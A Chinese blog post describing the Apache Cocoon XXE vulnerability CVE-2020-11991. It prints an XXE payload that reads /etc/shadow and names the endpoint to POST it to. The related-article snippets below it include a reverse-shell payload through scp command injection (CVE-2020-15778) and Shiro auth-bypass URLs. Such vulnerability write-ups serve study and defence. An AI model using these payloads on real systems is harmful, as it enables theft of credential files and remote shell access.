Apache Cocoon XML注入 [CVE-2020-11991]

最新推荐文章于 2023-02-12 02:21:41 发布
最新推荐文章于 2023-02-12 02:21:41 发布
阅读量279 收藏
点赞数
分类专栏: 2020HW 文章标签: java spring 大数据 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lipeixin1239/article/details/119369707
版权

受影响版本: Apache Cocoon <= 2.1.x

程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。

以下是apache社区官方提供利用方式:

<!--?xml version="1.0" ?--> 
<!DOCTYPE replace [<!ENTITY ent SYSTEM 
"file:///etc/shadow"> ]> 
<userInfo> 
<firstName>John</firstName> 
<lastName>&ent;</lastName> 
</userInfo>

与普通XXE并无差别,向/v2/api/product/manger/getInfo位置POST构造好的xml数据即可

来源:http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author

CVE2020-1938漏洞复现
千寻的博客
03-10 3125
文章目录0x00 漏洞介绍0x01影响版本受影响版本不受影响版本0x02 漏洞环境0x03 漏洞复现0x05 漏洞修护情况一更新高版本情况二 如未使用Tomcat AJP协议情况三 如果使用了Tomcat AJP协议免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责! 0x00 漏洞介绍 2020年1月6日,国家信息安全漏洞共享平台(CNVD) ...
追洞小组 | 实战CVE-2020-16898漏洞复现
Ms08067安全实验室
02-25 1402
三连一下,一起学安全文章来源|MS08067 WEB攻防知识星球本文作者:M-101(Ms08067实验室追洞小组成员) 漏洞复现分析 认准追洞小组漏洞名称Window...
Apache Cocoon入门
taotiede1的专栏
03-09 1013
在某种意义上,可将Cocoon视为一个基于XML的内容管理系统,因其提供了一种机制来描述Web信息项目(内容)的结构和语义、这些项目的关 系、它们如何随着时间的推移而发生改变(逻辑)以及在请求时如何向用户呈现(它们的样式)。事实上,Cocoon项目作为Apache Web服务器项目的一部分,它的作用之一就是组织和控制Apache麾下众多项目的文档化过程。作为对其真实用途的一个比喻,Cocoon
ModSecurity网站防火墙安装教程加WEB防御规则设置
云博客_资源宝分享
02-12 2466
ModSecurity网站防火墙安装教程加WEB防御规则设置
apache相关漏洞
m0_48520508的博客
09-30 4253
CVE-2019-17564-Apache Dubbo反序列化漏洞 CVE-2020-1938-Apache Tomcat文件包含漏洞 CVE-2020-1948-Apache Dubbo反序列化漏洞 CVE-2020-1956-Apache Kylin远程命令执行漏洞 CVE-2020-9480-Apache Spark远程代码执行漏洞 CVE-2020-9483-Apache SkyWalkingSQL注入漏洞
学习笔记-B/S - Exploits
热门推荐
人饭子的博客
11-02 4万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
[CVE-2020-11989]Apache Shiro权限绕过漏洞
公众号shadow sock7
07-09 6667
影响范围: Shiro < 1.5.3 Spring框架中只使用了Shiro鉴权 环境搭建: https://github.com/threedr3am/learnjavabug/blob/master/shiro/auth-bypass(shiro%3C1.5.3)/ 注意这里配置的是: /bypass/*,而不是/bypass/**。/bypass/**是不能用这个漏洞来绕过的。 这个洞利用价值不大,基本使用shiro做认证的系统,都会利用/** authc兜底 利用方式一: 通过访问
cocoon-flowscript-impl-1.0.0-m1-sources.jar
03-02
jar包,官方版本,自测可用
Apache Cocoon框架的cocoon-flowscript-block组件发布
Apache Cocoon是一种基于XML的Web发布框架,它利用了多个技术来创建Web应用程序。Cocoon通过“组件管道”的概念,将Web开发分解为更小的、独立的部分,每个部分由专门的组件处理。这种组件化的处理方式极大地提升了...
Apache Cocoon框架中cocoon-captcha-block组件解析
标题中提到的 "cocoon-captcha-block-1.0.0.tar.gz" 指明了这是一个与Apache Cocoon相关的组件模块包。首先,需要解释Apache Cocoon是什么: - **Apache Cocoon** 是一个开源的Web开发框架,它采用了基于组件的设计...
Apache Cocoon框架的cocoon-databases-impl-block-1.0.0发布
资源摘要信息:"Apache Cocoon是一个开源的Web开发框架,它基于关注点分离和组件...8. 数据库操作实现: cocoon-databases-impl-block包可能包含数据库操作组件,这些组件可集成进Cocoon管道中,实现与数据库的交互操作。
CVE-2020-11989 漏洞复现
克豪的博客
11-24 1861
这里的 shiro 拦截器需要设置成map.put("/admin/*", "authc"); 这里有两种poc,都是可以绕过 admin/a%25%32%66a /;/admin/aaa 第一种情况 /admin/a%25%32%66a——>传入到shiro自动解码一次变成/admin/a%2fa——>经过 decodeRequestString 变成/admin/a/a 由于这里我们的拦截器是map.put("/admin/*", "authc");,这里需要了解一下shiro的UR
CVE-2020-7471漏洞复现(SQL注入
anlalu233的博客
04-18 2107
1.漏洞影响范围 /受影响版本 Django 1.11.x < 1.11.28 Django 2.2.x < 2.2.10 Django 3.0.x < 3.0.3 Django 主开发分支 /不受影响产品版本 Django 1.11.28 Django 2.2.10 Django 3.0.3 2.前期准备 查看: 以下参考https://blog.csdn.net/qq_412...
CVE-2020-15778漏洞复现
臭nana的博客
08-04 1万+
产品:Openssh 影响的组件:SCP 漏洞版本:<= openssh-8.3p1 scp命令引发的命令注入 反弹shell的payload scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt' 实战测试,这里使用本机进行测试 1、查看ssh版本,符合漏洞版本 ssh -V 2、先在本地新建好文件,用于上传 2、本地开启监听 3、使用s.
Xml外部实体注入漏洞(XXE)与防护
xiaoyi52的专栏
09-12 2万+
Xml外部实体注入(XXE) 除了json外,xml也是一种常用的数据传输格式。对xml的解析有以下几种常用的方式:DOM,SAX,JDOM,DOM4J,StAX等。然而这几种解析方式都可能会出现外部实体注入漏洞,如微信支付的回调就出现过(见参考资料2)。 XML文档结构包括xml声明,DTD文档类型定义(可选)和文档元素,如下图所示: DTD的作用是定义XML文档的合法构建模块,可以...
CVE-2020-7471漏洞复现
qq_41260930的博客
02-13 6333
文章目录1. CVE-2020-7471漏洞复现1.1. 漏洞简介1.2. 漏洞影响范围1.3. 漏洞环境搭建(parrot 5.3.0-3parrot3-amd64)1.3.1. 安装 django 漏洞版本(测试使用版本为3.0.2)1.3.2. 安装postgres 数据库1.3.3. 创建测试数据库test1.3.4. 下载CVE-2020-7471到本地1.3.5. 修改配置文件1.3....
Apache Shiro权限绕过漏洞 (CVE-2020-11989) 挖掘分析和复现
smellycat000的专栏
11-12 2012
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介Apache Shiro作为Java框架,可被用于身份认证、授权等任务。整合Apache S...
CVE-2020-10560 OSSN任意文件读取漏洞复现
zzgslh的博客
04-10 1532
【漏洞详情】 CVE-2020-10560 OSSN任意文件读取漏洞,问题出现在Open Source Social Network(OSSN)5.3及之前版本中。攻击者可通过对Site_Key实施暴力破解攻击来为components/OssnComments/ossn_com.php和libraries/ossn.lib.upgrade.php插入特制的URL,然后利用该漏洞读取任意文件。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值